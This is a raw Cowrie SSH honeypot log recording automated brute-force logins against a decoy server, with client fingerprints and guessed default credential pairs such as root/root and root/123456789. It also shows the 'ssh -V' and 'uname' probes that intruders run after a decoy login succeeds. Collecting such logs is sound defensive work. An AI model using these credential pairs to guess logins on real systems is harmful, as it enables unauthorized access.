{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:28:45.697420Z","src_ip":"212.227.125.160","session":"83c90ad4bfab"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T20:28:45.698139Z","src_ip":"212.227.125.160","session":"83c90ad4bfab"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T20:28:51.261633Z","src_ip":"212.227.235.229","session":"a284076f5562"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T20:28:53.048215Z","src_ip":"212.227.125.160","session":"83c90ad4bfab"}
{"eventid":"cowrie.session.closed","duration":"9.9","message":"Connection lost after 9.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:28:54.351382Z","src_ip":"212.227.125.160","session":"83c90ad4bfab"}
{"eventid":"cowrie.session.closed","duration":"12.7","message":"Connection lost after 12.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:28:54.841348Z","src_ip":"212.227.235.229","session":"a284076f5562"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":48798,"dst_ip":"1.2.3.4","dst_port":22,"session":"0618b436f7d2","protocol":"ssh","message":"New connection: 217.154.1.158:48798 (1.2.3.4:22) [session: 0618b436f7d2]","sensor":"my-vps","timestamp":"2025-08-26T20:28:56.607297Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:28:56.608208Z","src_ip":"217.154.1.158","session":"0618b436f7d2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:28:56.623047Z","src_ip":"217.154.1.158","session":"0618b436f7d2"}
{"eventid":"cowrie.login.failed","username":"app","password":"app","message":"login attempt [app/app] failed","sensor":"my-vps","timestamp":"2025-08-26T20:28:56.666799Z","src_ip":"217.154.1.158","session":"0618b436f7d2"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:28:57.686923Z","src_ip":"217.154.1.158","session":"0618b436f7d2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:28:59.688568Z","src_ip":"212.227.235.229","session":"c588eb32a1df"}
{"eventid":"cowrie.session.closed","duration":180.30492210388184,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:28:59.693516Z","src_ip":"212.227.235.229","session":"c588eb32a1df"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":46964,"dst_ip":"1.2.3.4","dst_port":22,"session":"930d18ee1bf1","protocol":"ssh","message":"New connection: 217.154.1.158:46964 (1.2.3.4:22) [session: 930d18ee1bf1]","sensor":"my-vps","timestamp":"2025-08-26T20:29:13.749418Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:29:13.750625Z","src_ip":"217.154.1.158","session":"930d18ee1bf1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:29:13.765163Z","src_ip":"217.154.1.158","session":"930d18ee1bf1"}
{"eventid":"cowrie.login.failed","username":"nvidia","password":"nvidia","message":"login attempt [nvidia/nvidia] failed","sensor":"my-vps","timestamp":"2025-08-26T20:29:13.811478Z","src_ip":"217.154.1.158","session":"930d18ee1bf1"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:29:14.827151Z","src_ip":"217.154.1.158","session":"930d18ee1bf1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55343,"dst_ip":"1.2.3.4","dst_port":22,"session":"05e75ad1056c","protocol":"ssh","message":"New connection: 212.227.125.160:55343 (1.2.3.4:22) [session: 05e75ad1056c]","sensor":"my-vps","timestamp":"2025-08-26T20:29:18.122106Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:29:18.174146Z","src_ip":"212.227.125.160","session":"05e75ad1056c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:29:18.275241Z","src_ip":"212.227.125.160","session":"05e75ad1056c"}
{"eventid":"cowrie.login.success","username":"root","password":"1q@W3e$R5t","message":"login attempt [root/1q@W3e$R5t] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:29:19.180301Z","src_ip":"212.227.125.160","session":"05e75ad1056c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:29:19.510900Z","src_ip":"212.227.125.160","session":"05e75ad1056c"}
{"eventid":"cowrie.command.input","input":"ssh -V","message":"CMD: ssh -V","sensor":"my-vps","timestamp":"2025-08-26T20:29:19.511793Z","src_ip":"212.227.125.160","session":"05e75ad1056c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff","size":58,"shasum":"8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:29:19.629503Z","src_ip":"212.227.125.160","session":"05e75ad1056c"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:29:19.630570Z","src_ip":"212.227.125.160","session":"05e75ad1056c"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":45832,"dst_ip":"1.2.3.4","dst_port":22,"session":"450eb70cb4f0","protocol":"ssh","message":"New connection: 217.154.1.158:45832 (1.2.3.4:22) [session: 450eb70cb4f0]","sensor":"my-vps","timestamp":"2025-08-26T20:29:30.709029Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:29:30.710014Z","src_ip":"217.154.1.158","session":"450eb70cb4f0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:29:30.724354Z","src_ip":"217.154.1.158","session":"450eb70cb4f0"}
{"eventid":"cowrie.login.success","username":"root","password":"123456789","message":"login attempt [root/123456789] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:29:30.772390Z","src_ip":"217.154.1.158","session":"450eb70cb4f0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:29:30.881538Z","src_ip":"217.154.1.158","session":"450eb70cb4f0"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T20:29:30.882268Z","src_ip":"217.154.1.158","session":"450eb70cb4f0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:29:30.915258Z","src_ip":"217.154.1.158","session":"450eb70cb4f0"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:29:30.916245Z","src_ip":"217.154.1.158","session":"450eb70cb4f0"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":38900,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d553507ab2d","protocol":"ssh","message":"New connection: 217.154.1.158:38900 (1.2.3.4:22) [session: 6d553507ab2d]","sensor":"my-vps","timestamp":"2025-08-26T20:29:47.812659Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:29:47.813619Z","src_ip":"217.154.1.158","session":"6d553507ab2d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:29:47.827696Z","src_ip":"217.154.1.158","session":"6d553507ab2d"}
{"eventid":"cowrie.login.success","username":"root","password":"rootroot","message":"login attempt [root/rootroot] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:29:47.874421Z","src_ip":"217.154.1.158","session":"6d553507ab2d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:29:47.981731Z","src_ip":"217.154.1.158","session":"6d553507ab2d"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T20:29:47.982480Z","src_ip":"217.154.1.158","session":"6d553507ab2d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:29:47.997873Z","src_ip":"217.154.1.158","session":"6d553507ab2d"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:29:47.998886Z","src_ip":"217.154.1.158","session":"6d553507ab2d"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":51046,"dst_ip":"1.2.3.4","dst_port":22,"session":"1fc4d029bf15","protocol":"ssh","message":"New connection: 217.154.1.158:51046 (1.2.3.4:22) [session: 1fc4d029bf15]","sensor":"my-vps","timestamp":"2025-08-26T20:30:05.167058Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:30:05.168108Z","src_ip":"217.154.1.158","session":"1fc4d029bf15"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:30:05.182341Z","src_ip":"217.154.1.158","session":"1fc4d029bf15"}
{"eventid":"cowrie.login.failed","username":"es","password":"es123","message":"login attempt [es/es123] failed","sensor":"my-vps","timestamp":"2025-08-26T20:30:05.230158Z","src_ip":"217.154.1.158","session":"1fc4d029bf15"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:30:06.247726Z","src_ip":"217.154.1.158","session":"1fc4d029bf15"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:30:17.144362Z","src_ip":"79.124.8.120","session":"73c4f742d890"}
{"eventid":"cowrie.session.closed","duration":180.07968950271606,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:30:17.151489Z","src_ip":"79.124.8.120","session":"73c4f742d890"}
{"eventid":"cowrie.session.connect","src_ip":"217.154.1.158","src_port":35130,"dst_ip":"1.2.3.4","dst_port":22,"session":"70efeaea0f93","protocol":"ssh","message":"New connection: 217.154.1.158:35130 (1.2.3.4:22) [session: 70efeaea0f93]","sensor":"my-vps","timestamp":"2025-08-26T20:30:22.074215Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:30:22.074982Z","src_ip":"217.154.1.158","session":"70efeaea0f93"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:30:22.089509Z","src_ip":"217.154.1.158","session":"70efeaea0f93"}
{"eventid":"cowrie.login.failed","username":"sugi","password":"sugi","message":"login attempt [sugi/sugi] failed","sensor":"my-vps","timestamp":"2025-08-26T20:30:22.150631Z","src_ip":"217.154.1.158","session":"70efeaea0f93"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:30:23.167182Z","src_ip":"217.154.1.158","session":"70efeaea0f93"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":35506,"dst_ip":"1.2.3.4","dst_port":22,"session":"f7da075aafa8","protocol":"ssh","message":"New connection: 45.88.8.215:35506 (1.2.3.4:22) [session: f7da075aafa8]","sensor":"my-vps","timestamp":"2025-08-26T20:31:26.357692Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:31:27.049505Z","src_ip":"45.88.8.215","session":"f7da075aafa8"}
